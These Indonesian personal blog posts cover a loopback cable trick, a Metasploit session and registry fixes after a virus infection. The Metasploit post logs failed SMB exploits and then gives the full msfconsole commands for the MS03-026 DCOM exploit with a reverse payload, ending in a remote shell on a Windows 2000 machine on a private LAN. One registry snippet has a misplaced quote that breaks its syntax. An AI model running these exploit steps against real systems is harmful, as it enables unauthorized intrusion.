Lan connect di komputer Offline

Binggung kan judulnya ....

Temen gw telpon, trus dia tanya kenapa kok windows xp-nya ga bisa terhubung ke win 2003 yg terinstall di vmware? Dan gw tau lan status ga bakal connect kalo ga dia ke hubung sama jaringan baik melalui hub/switch ataw peer to peer.

Untung temen gw perna ngajarin gw bwt bikin komputer kelihatanya connect padahal ga terhubung sama jaringan.

1. Cari kabel utp kira2 sejengkal aja (ngapain panjang2)
2. RJ45 & Cramping tool

Langkah pertama: Lu harus bikin straight dulu di salah satu ujung kabel (tau donk straight yg kek gmana..) .



Langkah kedua : Ujung yang satunya lagi lu kupas kabelnya yg warna :
- Putih-orange
- Orange
- Putih-hijau
- Hijau
sisanya biarin aja ...

Langkah ketiga : Lu satuin deh tuh kabel
- Putih-orange <-- satuin --> Putih-hijau
- Orange <-- satuin --> Hijau

Jadi deh kabelnya..

Akhirnya bisa connect jaringan lewat vmware walaupun komputer offline

Bisa Juga dengan cara Loopback Adapter pada Windows XP, Itu bisa di lihat di http://cerita-gwe.blogspot.com


Lagi Jajal Metasploit Framework

Dah lama gw punya Metasploit, cuma masih bingung ini gunanya bwt apa, toh lom perna coba sama skali.

Dari Cerita2 kalo Metasploit tuh gunanya byk, salah satu-nya untuk masuk ke dalam system komputer orang alias hack. Dah mulai deh gw Install dulu Metasploit Framework (Gw pake yg versi terbaru 3.1)

Target pertama gw bwt jajal pake win 2000 aja bwt asal bisa masuk

Mulai deh gw jalanin Metasploit 3 GUI Dan gw mulai pencarian exploit yg cocok bwt win 2000. Di situ dapet banyak, saking banyak nya gw sampe bingung yg mana yg bisa bwt gw pake untuk masuk ke dalam windows target gw. Akhirnya daripada bingung gw coba maen cleck-click tanpa baca2 terlebih dahulu. dah hasil nya:


04:05:34 - Initialized the Metasploit Framework GUI.
04:05:18 - ms04_031_netdde [*] Launching exploit windows/smb/ms04_031_netdde...
04:05:19 - ms04_031_netdde [*] Started bind handler
04:05:20 - ms04_031_netdde [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445).
(Gagal......)
04:05:39 - ms04_031_netdde [*] Launching exploit windows/smb/ms04_031_netdde...
04:05:40 - ms04_031_netdde [*] Started bind handler
04:05:51 - ms04_031_netdde [-] Exploit failed: The connection timed out (192.168.30.217:445).
(Gagal lagi...)
04:05:29 - msdns_zonename [*] Launching exploit windows/smb/msdns_zonename...
04:05:30 - msdns_zonename [*] Started bind handler
04:05:31 - msdns_zonename [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445).
(Gagal Lagi..)
04:05:56 - ms06_025_rras [*] Launching exploit windows/smb/ms06_025_rras...
04:05:57 - ms06_025_rras [*] Started bind handler
04:05:58 - ms06_025_rras [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445).
(Gagal mulu..)
04:05:41 - ms04_011_lsass [*] Launching exploit windows/smb/ms04_011_lsass...
04:05:42 - ms04_011_lsass [*] Started reverse handler
04:05:43 - ms04_011_lsass [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445).
(Gagal lagi dah mulai bt..)
04:05:59 - ms04_007_killbill [*] Launching exploit windows/smb/ms04_007_killbill...
04:05:00 - ms04_007_killbill [*] Started reverse handler
04:05:01 - ms04_007_killbill [-] Exploit failed: The connection was refused by the remote host (192.168.20.217:445).
(Akhirnya Gagal lagi ...)
- Ampun dah ... gak ada yg bisa masuk, cupu bgt dah gw
- Mulai Lirik-lirik jam, udah jam 4 pagi liwat
- Coba lagi cari referensi tutorial di google
- Dapet, tapi dsitu pakenya Metasploit 2.7 ** Untung perna download jg yg versi lama nya
- Lansung aja ga pake lama Gw Uninstall yg v3.1 & install lagi yg v2.7
- Gw jalan lewat console "MSFConsole", seperti di bawah ini:

+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.20.217
RHOST -> 192.168.20.217
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.20.7
LHOST -> 192.168.20.7
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 192.168.20.7:4321 <-> 192.168.20.217:1028

Microsoft Windows 2000 [Version 5.00.2195] <<= masuk juga
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Bounvil:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.217
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100

C:\WINNT\system32>

Akhirnya bisa jg masuk ke windows 2000.. Padahal kalo mo make KaHT malah lebih gampang bwat masuk ke win 2000, tp kalo ke xp ga bisa.

Dah ahh, skrng dah jam 5.45 waktu kelapa Gading, sekarang jam nya tidur, bsok pagi hrus kerja lg .. Bu byee...


cmiiw

Memperbaiki Regedit yg berubah karena virus

Jikalau komputer kita kena virus, effect yg biasa kita dapat adalah sbg brikut:
- Folder option ter-hidden (supaya kita tidak bisa membuka hidden file, karena biasanya virus menghidden file nya agar tidak bisa terhapus)
- Task-manager tidak bisa di akses (agar tidak bisa memeriksa process file yg sedang berjalan)

- Regedit Tidak Aktive (Supaya kita tidak bisa memperbaiki regedit yg brubah)

Langkah2 perbaikan :

Karena regedit terdisable, kita tidak bisa memasuki menu registry. Jadi kita harus mengunakan alternative untuk masuk ke dalam regedit. Download terlebih dahulu Regedit 1.0 ataw bisa juga di ambil dari artikel sebelum nya tentang soffware untuk komputer bervirus. Kemudian rubah file registry, seperti di bawah ini:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Regedit kini telah kembali aktif

Mengaktifkan task manager & folder option. Karena regedit sudah kembali aktif, kini kita menjalankan/mengakaktifkan ke-duanya sekaligus. yth dgn cara :

Buka notepad, ketik code berikut:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"
DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:000000

kemudian save dengan extention *.reg. Contoh :

repair.reg